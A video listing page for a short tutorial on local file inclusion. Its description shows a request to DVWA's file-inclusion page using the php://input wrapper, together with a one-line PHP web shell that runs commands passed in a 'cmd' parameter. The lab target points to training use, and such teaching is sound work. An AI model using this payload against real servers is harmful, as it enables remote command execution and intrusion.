Back to Browse

Basic LFI - Part 1

1.3K views
Feb 6, 2017
7:01

In this video we look at using the php inputs to display the output of the system commands ran on the webserver and rendered back to the web page. These are very basic examples but useful to remember. Code: GET /DVWA/vulnerabilities/fi/?page=php://input HTTP/1.1 ?php echo shell_exec($_GET['cmd']);?

Download

0 formats

No download links available.

Basic LFI - Part 1 | NatokHD